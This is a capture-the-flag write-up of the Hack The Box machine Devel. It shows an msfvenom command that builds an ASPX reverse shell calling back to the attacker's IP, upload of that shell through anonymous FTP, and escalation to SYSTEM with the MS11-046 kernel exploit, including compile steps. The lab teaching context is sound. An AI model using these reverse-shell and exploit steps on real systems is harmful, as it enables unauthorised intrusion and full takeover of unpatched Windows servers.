Hack The Box — Devel
Devel is an Easy level Windows machine on Hack The Box.
ENUMERATION
An nmap scan shows us that FTP and HTTP are open and target is running a windows operating system.Moreover FTP has anonymous login allowed.
We connect to ftp and try downloading all files using mget command however we don’t find anything interesting within it.
However if we try uploading any file to the ftp server, we are able to do it.(not shown in the screenshot above) To do so, simply try making a file called test.txt in you kali and in the FTP which we are connected to , run the command— put test.txt and your file will be uploaded.You can check it by running the ls command.
So Since we can upload a file, lets upload a malicious one, For this pirticular target, we will be uploading an ASPX shell reason being that our target is running IIS which is a windows server(refer Nmap results) and whenever we have IIS, we go with an aspx shell.
In order to create an aspx shell, you can either use msfvenom or download an aspx shell from github.
MSFVENOM COMMAND TO GENERATE AN ASPX REVERSE SHELL
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.37.87 LPORT=7777 -f aspx -o shell.aspx
(DO NOTE that msfvenom makes a 32 bit reverse shell by default which works on both 32 bit and 64 bit architectured target)
ASPX REVERSE SHELL DOWNLOAD
You can also try downloading a aspx reverse shell from github which i did.This is really good — https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
Once you have downloaded it, make sure to change the ip and port in the script.Now simply upload the reverse shell in ftp using- put revshell.aspx
EXPLOITATION
Now all you have to do is start a netcat listener and go to the webpage and access the reverse shell which will execute it.
And we have a shell. . .
PRIVILEGE ESCALATION
For privilege escalation, i will cover 2 mannual ways, however you can check out the way using metasploit as well.
We run whoami /priv to check what privileges are enabled on the target and also systeminfo command to see details about our target machine.
We see that we have some privileges enabled, Our target is running windows 7 and we can even see the BUILD of our target which is 6.1.7600 N/A Build 7600 moreover we can see that the name of the os is DEVEL and if you read the results of the systeminfo command carefully(not shown in the above screenshot) you will find something called “HOTFIX” on the left side which is set to N/A meaning that our target hasn’t been patched.
We can also try to run a script such as WINPEAS to enumerate varous privilege escalation vectors on our target.You can download the .bat extension of winpeas here as the .exe one doesnt seem to work well on the target
Download Link-https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat
To transfer files,Simply start a python httpserver in your kali to host files
and download it in windows using Certutil( I tried using powershell-invoke and wget however it didn’t seem to work) And finally run winpeas
I tried to have a look at the results however the script kept running and didn’t stop.moreover nothing was highlighted either.Still it is a good practice to enumerate our target as much as we can…maybe even try running a Windows Exploit Suggester.
1) USING KERNEL EXPLOIT (MS11–046)
Since we know the build of our target os after running the systeminfo command, we can simply google the build and it will instant lead us to a kernel exploit(MS11–046)
If you look at the links above, you can find the exploit in .c extension which means that it is written in C and we have to compile it into an exe file.However if you take a look at the second url by abatachy17, you can find a pre compiled exploit of (MS11–046) on his github repo--https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe
Now simply transfer the exploit to the target machine using certutil
IF YOU WANT TO COMPILE THE C EXPLOIT
However if you want to compile the C exploit, just go to exploit-db and read about (MS11–046) and you will find instructions on how to compile the exploit.
WE NEED TO COMPILE THE EXPLOIT USING — mingw32 (i have actually heard about this compiler for the first time) Anyways a google search shows us how to install it
COMMAND TO INSTALL-
apt-get updateapt-get install mingw-w64
Once mingw32 is installed, simply use it to compile the C exploit into exe as per the instruction given in the description of exploit code(in the 2nd above image)
COMMAND TO COMPILE-
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
NOW ALL WE HAVE TO DO IS RUN THE EXPLOIT AND WE GAIN A SYSTEM SHELL !!!
2) USING JUICY POTATO EXPLOIT
We can also run the Juicy Potato Exploit.After running the whoami /priv command, We immediately see that SeImpersonatePrivilege is enabled.And thus we can use the use juicy exploit.This exploit is Used when the Windows target is less than Windows 10 1809 or less than Windows Server 2019 and for it to work, SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege must be ENABLED. In our case our target is running windows 7 and SeImpersonatePrivilege is enabled so we can use it !!! However i will not cover it in this writeup.You can check out one of my previous writeups of TryHackMe where it has been used-https://sparshjazz.medium.com/tryhackme-retro-866de1e4242a?postPublishedType=repub
CONCLUSION
In this machine we learned that
- if FTP allows file upload, we can upload a malicious reverse shell to gain initial access.
- In case of an IIS server running, we use can use an aspx reverse shell
- We can google the build of the target OS an try searching for kernel exploits for that particular build.
- We can use juicy potato exploit if the target windows machine is less than Windows 10 1809 or less than Windows Server 2019 and for it to work, SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege must be ENABLED.
For more such writeups, make sure you follow me here on Medium. Until next time- ZEUS
